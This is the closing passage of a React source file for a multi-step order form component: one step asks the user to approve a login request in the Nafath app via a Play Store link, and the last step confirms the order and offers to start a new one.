                <br />
                Please accept the login request from Nafath app
              </p>
              <div className="mt-10">
                <Link
                  target="_blank"
                  to={
                    "https://play.google.com/store/apps/details?id=sa.gov.nic.myid&pli=1"
                  }
                  type="button"
                  className="bg-teal-700 text-white w-full text-center flex gap-3 justify-center items-center text-lg font-bold p-3 rounded-[4px]"
                >
                  Open Nafath App <FaArrowRight className="inline" />
                </Link>
              </div>
            </div>
          </div>
        )}

        {/* step 8, order confirm */}
        {step === 10 && (
          <div className="step">
            <p className="mt-4">
              Your order has been confirmed. You will receive a call from our
              customer service representative to confirm your order.
            </p>

            {/* start another order */}
            <button
              onClick={() => window.location.reload()}
              className="mt-10 bg-teal-800 px-10 py-3 rounded-[10px] text-lg text-white"
            >
              Start A New Order
            </button>
          </div>
        )}
      </form>
    </div>
  );
};

export default MainForm;
